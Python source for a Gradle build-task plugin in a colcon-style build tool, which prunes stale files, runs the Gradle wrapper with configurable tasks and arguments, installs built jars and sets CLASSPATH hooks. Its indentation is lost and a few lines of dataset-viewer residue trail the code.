class GradleBuildTask(TaskExtensionPoint):
"""Build gradle packages."""
def __init__(self): # noqa: D107
super().__init__()
satisfies_version(TaskExtensionPoint.EXTENSION_POINT_VERSION, '^1.0')
def _build_file_tree(self, start_path):
out_dirnames = set()
out_filenames = set()
for dirname, dirnames, filenames in os.walk(start_path):
for subdirname in dirnames:
out_dirnames.add(
os.path.relpath(
os.path.join(dirname, subdirname), start=start_path))
for filename in filenames:
out_filenames.add(
os.path.relpath(
os.path.join(dirname, filename), start=start_path))
return (out_dirnames, out_filenames)
def add_arguments(self, *, parser): # noqa: D102
parser.add_argument(
'--gradle-args',
nargs='*', metavar='*', type=str.lstrip,
help='Pass arguments to Gradle projects. '
'Arguments matching other options must be prefixed by a space,\n'
'e.g. --gradle-args " --help"')
parser.add_argument(
'--gradle-task',
help='Run a specific task instead of the default task')
async def build( # noqa: D102
self, *, additional_hooks=None, skip_hook_creation=False
):
pkg = self.context.pkg
args = self.context.args
logger.info(
"Building Gradle package in '{args.path}'".format_map(locals()))
if additional_hooks is None:
additional_hooks = []
# add jars and classes to CLASSPATH with wildcards
# https://docs.oracle.com/javase/8/docs/technotes/tools/windows/classpath.html#A1100762
additional_hooks += create_environment_hook(
'classpath_jars', Path(args.install_base), pkg.name,
'CLASSPATH', os.path.join('share', pkg.name, 'java', '*'),
mode='prepend')
additional_hooks += create_environment_hook(
'classpath_classes', Path(args.install_base), pkg.name,
'CLASSPATH', os.path.join('share', pkg.name, 'java'),
mode='prepend')
try:
env = await get_command_environment(
'build', args.build_base, self.context.dependencies)
except RuntimeError as e:
logger.error(str(e))
return 1
rc = await self._build(args, env)
if rc and rc.returncode:
return rc.returncode
rc = await self._install(args, env)
if rc and rc.returncode:
return rc.returncode
if not skip_hook_creation:
create_environment_scripts(
pkg, args, additional_hooks=additional_hooks)
async def _build(self, args, env):
self.progress('build')
# remove anything on the destination tree but not in the source tree
src_package_src_dir = os.path.join(args.path, 'src')
dst_package_src_dir = os.path.join(args.build_base, 'src')
src_dirnames, src_filenames = self._build_file_tree(
src_package_src_dir)
dst_dirnames, dst_filenames = self._build_file_tree(
dst_package_src_dir)
prune_dirnames = dst_dirnames - src_dirnames
prune_filenames = dst_filenames - src_filenames
for prune_filename in prune_filenames:
os.remove(os.path.join(dst_package_src_dir, prune_filename))
for prune_dirname in prune_dirnames:
if os.path.exists(prune_dirname):
shutil.rmtree(os.path.join(dst_package_src_dir, prune_dirname))
# copy files from the source directory to the build one to avoid
# polluting the latter during the build process
dir_util.copy_tree(args.path, args.build_base, update=1)
# Gradle Executable
if has_wrapper_executable(args):
cmd = [str(get_wrapper_executable(args).absolute())]
elif GRADLE_EXECUTABLE is not None:
cmd = [GRADLE_EXECUTABLE]
else:
raise RuntimeError(
"Could not find 'gradle' or 'wrapper' executable")
# Gradle Task (by default 'assemble')
if args.gradle_task:
cmd += [args.gradle_task]
else:
cmd += ['assemble']
# Gradle Arguments
cmd += (args.gradle_args or [])
cmd += ['--stacktrace']
# Add install_base to environment in GRADLE_INSTALL_PREFIX
env['GRADLE_INSTALL_PREFIX'] = args.install_base
# invoke build step
return await run(
self.context, cmd, cwd=args.build_base, env=env)
async def _install(self, args, env):
self.progress('install')
pkg = self.context.pkg
# remove anything on the destination tree but not in the build tree
bld_package_jar_dir = os.path.join(args.build_base, 'build', 'libs')
dst_package_jar_dir = os.path.join(
args.install_base, 'share', pkg.name, 'java')
os.makedirs(dst_package_jar_dir, exist_ok=True)
bld_dirnames, bld_filenames = self._build_file_tree(
bld_package_jar_dir)
dst_dirnames, dst_filenames = self._build_file_tree(
dst_package_jar_dir)
prune_dirnames = dst_dirnames - bld_dirnames
prune_filenames = dst_filenames - bld_filenames
for prune_filename in prune_filenames:
os.remove(os.path.join(dst_package_jar_dir, prune_filename))
for prune_dirname in prune_dirnames:
if os.path.exists(prune_dirname):
shutil.rmtree(
os.path.join(dst_package_jar_dir, prune_dirname))
for jar in glob.glob(os.path.join(bld_package_jar_dir, '*.jar')):
jar_filename = os.path.basename(jar)
shutil.copy2(jar, os.path.join(dst_package_jar_dir, jar_filename))
| 1.976563 | 2 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.